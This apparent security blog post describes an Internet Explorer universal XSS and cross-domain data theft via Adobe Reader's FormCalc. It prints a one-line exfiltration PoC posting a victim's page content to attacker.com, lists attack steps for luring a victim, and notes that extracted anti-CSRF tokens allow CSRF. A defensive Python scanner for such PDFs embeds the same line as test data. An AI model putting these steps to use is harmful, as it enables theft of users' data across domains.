Universal IE XSS and Cross Domain Data Theft with Adobe Reader - Week 2

Internet Explorer Universal XSS

We read a nice analysis of the Internet Explorer Universal XSS that was disclosed on Full Disclosure last week.

It is quite simple to exploit, and the code speaks for itself:

Quick Facts

  • Microsoft will release a fix.
  • There is also another PoC that doesn't require user interaction.
  • The only mitigation is sending X-Frame-Options (XFO) headers with every response, which is not really practical.
  • It is claimed to be a regression of CVE-2014-0293, about which we couldn't find any information.

Cross Domain Data Theft Via Adobe Reader

It's been in the wild for a long time, so you might have heard about this already, but we wanted to mention it here in case you missed it. We all know that hosting user-generated content on your actual domain isn't the best thing to do, but thanks to Adobe Reader, there is more!

If your website serves user-uploaded PDF files for inline viewing, an uploader can use this to read content from your domain and post it to another domain.

PDF supports a scripting language called FormCalc. That particular scripting language has really interesting functions called GET, POST and PUT. As you can guess, those functions issue HTTP requests, with cookies attached, to the origin that hosts the file. You can read about them in detail in the original documentation here.

Here is the PoC in FormCalc:

var content = GET("myfriends.php"); Post("http://attacker.com",content);
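As an added example, not part of the original post: a small Python scanner that an upload pipeline could run on user-submitted PDFs to flag XFA FormCalc scripts that call Get/Post/Put. It assumes the XFA packet is stored uncompressed or in FlateDecode streams (other filters are not handled), relies on FormCalc being XFA's default script contentType, and builds its sample PDF fragment inline from the PoC above.

```python
import re
import zlib

# XFA <script> elements; FormCalc is the default when contentType is absent,
# JavaScript is marked contentType="application/x-javascript".
SCRIPT = re.compile(rb'<script\b([^>]*)>(.*?)</script>', re.S | re.I)
# FormCalc's URL functions; their names are case-insensitive (GET, Get, get).
NET_CALL = re.compile(rb'\b(get|post|put)\s*\(', re.I)
# Raw PDF stream bodies; XFA packets normally live in FlateDecode streams.
STREAM = re.compile(rb'stream\r?\n(.*?)\nendstream', re.S)

def _inflate_streams(pdf: bytes) -> bytes:
    """Return the file bytes followed by every stream that zlib can inflate."""
    parts = [pdf]
    for m in STREAM.finditer(pdf):
        try:
            parts.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed (or corrupt); raw bytes are already in `pdf`
    return b"\n".join(parts)

def find_formcalc_network_calls(pdf: bytes) -> list:
    """Return (FUNCTION, snippet) for each Get/Post/Put call inside a FormCalc script."""
    hits = []
    for m in SCRIPT.finditer(_inflate_streams(pdf)):
        attrs, body = m.group(1), m.group(2)
        if b"x-javascript" in attrs.lower():
            continue  # XFA JavaScript: different engine, out of scope for this check
        for call in NET_CALL.finditer(body):
            snippet = body[call.start():call.start() + 60].decode("latin-1")
            hits.append((call.group(1).decode().upper(), snippet))
    return hits

def build_sample_pdf(xfa_xml: bytes) -> bytes:
    """Constructed test input: a PDF fragment with the XFA packet in a FlateDecode
    stream (no xref table, so not a complete PDF, but the layout a scanner sees)."""
    body = zlib.compress(xfa_xml)
    return (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /AcroForm << /XFA 2 0 R >> >>\nendobj\n"
            b"2 0 obj\n<< /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + body + b"\nendstream\nendobj\n%%EOF\n")

# Constructed XFA template that embeds the post's PoC in a docReady event.
POC_XFA = (b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform name="f">'
           b'<event activity="docReady"><script>var content = GET("myfriends.php"); '
           b'Post("http://attacker.com",content);</script></event></subform></template></xdp:xdp>')

if __name__ == "__main__":
    for func, snippet in find_formcalc_network_calls(build_sample_pdf(POC_XFA)):
        print(f"FormCalc {func} call found: {snippet}")
```

A hit is a reason to refuse inline rendering of that upload (or to serve it only from a separate, cookie-less origin), not proof of malice, since legitimate XFA forms can also submit data with these functions.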

Attack ToDo

  1. Create a PDF file containing the desired attack logic, which probably tries to extract sensitive information.
  2. Upload that file to the target website.
  3. Find its URL.
  4. Send its URL to the victim and hope she clicks.
  5. Go get some sleep until you hear from the victim.

Quick Facts

  • We tested this with IE + Adobe Reader 11, and it worked without any issues.
  • You need a permissive crossdomain.xml on the receiving domain (attacker.com in the PoC) to enable cross-domain posting. We found one for you and put it here.
  • Even if you don't want to exfiltrate any data, or if that gets prevented in the future, you can still do CSRF with this, since you can read the response, extract the anti-CSRF tokens and hit the particular functionality!